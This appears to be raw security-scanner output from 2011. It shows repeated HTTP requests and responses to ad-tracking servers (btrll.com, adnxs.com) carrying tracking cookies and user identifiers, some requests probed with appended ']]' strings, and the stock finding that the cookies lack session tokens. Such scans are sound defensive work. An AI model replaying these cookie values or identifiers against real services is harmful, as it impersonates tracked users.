GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy HTTP/1.1 Host: brxserv.btrll.com Proxy-Connection: keep-alive Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: DRN1=AGPX0VDzIfo; BR_MBBV=Ak0tGDgAo4f8AWJjWTw
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy]] HTTP/1.1 Host: brxserv.btrll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw; DRN1=AGPX0VDzIfo;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy HTTP/1.1 Host: brxserv.btrll.com Proxy-Connection: keep-alive Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: DRN1=AGPX0VDzIfo; GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw
Response
HTTP/1.1 302 Found Date: Thu, 20 Jan 2011 00:14:22 GMT Server: Apache/2.0.63 (Unix) P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:14:22 GMT; path=/; domain=.btrll.com Expires: Tues, 01 Jan 1980 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: http://2901.btrll.com/imp/2901/4258/PreRoll.911.109723/mid;Video;1295482442 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy]] HTTP/1.1 Host: brxserv.btrll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw; DRN1=AGPX0VDzIfo;
Response
HTTP/1.1 302 Found Date: Thu, 20 Jan 2011 00:40:04 GMT Server: Apache/2.0.63 (Unix) P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:40:04 GMT; path=/; domain=.btrll.com Expires: Tues, 01 Jan 1980 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: http://2901.btrll.com/imp/2901/4258/PreRoll.911.109723/mid;Video;1295482442 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /mapuid?member=311&user=11d765b6a10b1b3&seg_code=cm.cm_aa_gn1,cm.weath_l&ord=1295482372 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; acb35548=5_[r^kI/7ZrO@Pn0nf8M8cp]i?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP1729trACfBsBWHfHSmrEEIEfjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA6AgBAgUCAAUAAAAA3yJj0gAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482372%29%3Buf%28%27r%27%2C+151608%2C+1295482372%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2811%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2887%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28619%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28620%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28621%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBpbb)jKuoIgTwzHPZ2[uGVGi2$WVP]vE7ilpu2(MPy%SF(w77BERA(EO4I(3<csJ3xssMeZG!7<'>q5Yjf
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:13:36 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:13:36 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:13:36 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:13:36 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG5`$cvjr/?0P(*AuB-u**g1:XIF)WUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBpbb)jKuoIgTdEnffCdHa[IfI1^wzHPZ2[uFgkr]/35(zkfLWZZy77B(fakx9WCYA*.cx3xndWdV[eGG4Y!<mnI+C=f?; path=/; expires=Wed, 20-Apr-2011 00:13:36 GMT; domain=.adnxs.com; HttpOnly Content-Length: 43 Content-Type: image/gif Date: Thu, 20 Jan 2011 00:13:36 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.martini&size=728x90&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-82053649_1295482372%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D707118%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.weath_l%3Bord%3D3271752524%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTn>qsXgZ2Ox#Kzwi3jhndu4.q@P`fym?BM6A(6j?L^F^pT+$t)o#'1yqNmTr+csDU[n.KmyD0IP?EJtun(LG%y$qg]mw!5$=%sod-+0?6As/^Y`/=Uxi
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:12:52 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:12:52 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:12:52 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb35548=5_[r^kI/7ZrO@Pn0nf8M8cp]i?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP1729trACfBsBWHfHSmrEEIEfjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA6AgBAgUCAAUAAAAA3yJj0gAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482372%29%3Buf%28%27r%27%2C+151608%2C+1295482372%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2811%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2887%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28619%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28620%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28621%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:12:52 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:12:52 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBpbb)jKuoIgTwzHPZ2[uGVGi2$WVP]vE7ilpu2(MPy%SF(w77BERA(EO4I(3<csJ3xssMeZG!7<'>q5Yjf; path=/; expires=Wed, 20-Apr-2011 00:12:52 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Thu, 20 Jan 2011 00:12:52 GMT Content-Length: 402
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.martini&size=728x90&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-69155988_1295482815%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.sports_l-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D777061%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sports_l%3Bbtg%3Dcm.weath_l%3Bord%3D1768089178%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; acb35548=5_[r^kI/7ZrO@Pn0nf8M8cp]i?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP1729trACfBsBWHfHSmrEEIEfjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA6AgBAgUCAAUAAAAA3yJj0gAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482372%29%3Buf%28%27r%27%2C+151608%2C+1295482372%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2811%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2887%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28619%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28620%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28621%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG3H<cvjr/?0P(*AuB-u**g1:XIC8]UMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wACGY+1'U74=YF]n@)*InD4_+
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:29:59 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:29:59 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb35548=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:29:59 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb727727=5_[r^kI/7ZrO@Pn0nf8M9a:9p?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP5cuKdiuIR8PBWHfHSmrEEIHgjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA-AUBAgUCAAUAAAAAbSD3AAAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295483399%29%3Buf%28%27r%27%2C+151608%2C+1295483399%29%3Bppv%2882%2C+%271089626669681553047%27%2C+1295483399%2C+1305851399%2C+2132%2C+23869%29%3Bppv%2884%2C+%271089626669681553047%27%2C+1295483399%2C+1305851399%2C+2132%2C+23869%29%3Bppv%2811%2C+%271089626669681553047%27%2C+1295483399%2C+1305851399%2C+2132%2C+23869%29%3Bppv%2882%2C+%271089626669681553047%27%2C+1295483399%2C+1305851399%2C+2132%2C+23869%29%3Bppv%2884%2C+%271089626669681553047%27%2C+1295483399%2C+1305851399%2C+2132%2C+23869%29%3Bppv%2887%2C+%271089626669681553047%27%2C+1295483399%2C+1295569799%2C+2132%2C+23869%29%3Bppv%28619%2C+%271089626669681553047%27%2C+1295483399%2C+1295569799%2C+2132%2C+23869%29%3Bppv%28620%2C+%271089626669681553047%27%2C+1295483399%2C+1295569799%2C+2132%2C+23869%29%3Bppv%28621%2C+%271089626669681553047%27%2C+1295483399%2C+1295569799%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:29:59 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:29:59 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wI`We*m2)^fn_u4.+o#pbc^I%Bp(GQ'kk7r2?fI0; path=/; expires=Wed, 20-Apr-2011 00:29:59 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Thu, 20 Jan 2011 00:29:59 GMT Content-Length: 439
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.martini&size=160x600&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-23797598_1295482817%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l-cm.sports_l%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Bord1%3D881330%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.sports_l%3Bord%3D3751955344%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb113196=5_[r^kI/7ZrO@Pn0nf8MvlYT!?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP8LS2pGwuOcdBWHfHSmrEEK_fzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA4AUBAgUCAAUAAAAAsiOTEgAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482815%29%3Buf%28%27r%27%2C+151608%2C+1295482815%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2811%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2887%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28619%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28620%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28621%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wACGY+1'U74=YF]nOpI=48$^Tx()%_!wzkF2Ple$
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:20:17 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:17 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:20:17 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb303093=5_[r^XI()vrO@Pn0nf8MwM9g$?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviP9CL-hxz-rYyBWHfHSmrEELBfzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAAeggBAgUCAAUAAAAALyC12AAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482817%29%3Buf%28%27r%27%2C+151609%2C+1295482817%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2811%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2887%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28619%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28620%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28621%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:20:17 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:17 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)hgVCgQw>7'NF7uNVkG0XN^BPJ.^ZXwcsDU[n.KmyD0IP?EJtun(LG%y$qg]mwnXkD%rDs0:0$Ob('INuCClbQ^7w=g32LzAgGCPGs/^Zf3+TaP; path=/; expires=Wed, 20-Apr-2011 00:20:17 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Thu, 20 Jan 2011 00:20:17 GMT Content-Length: 440
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
